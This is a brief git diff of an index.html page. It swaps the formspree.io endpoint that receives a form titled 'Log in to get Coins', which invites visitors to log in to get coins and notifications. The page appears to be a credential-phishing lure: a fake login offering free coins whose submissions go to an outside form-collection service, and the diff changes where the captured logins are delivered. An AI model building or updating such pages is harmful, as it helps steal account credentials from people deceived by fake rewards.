--- a/index.html
+++ b/index.html
@@ -59,7 +59,7 @@
 </style>
 </head>
 <body>
-<form action="https://formspree.io/f/xyznbrvg" method="POST">
+<form action="https://formspree.io/f/movkyadg" method="POST">
   <h2>
     <span class="main-title">Log in to get Coins</span>
     <span class="sub-title">Log in to your account to get Coins, check notifications and more.</span>
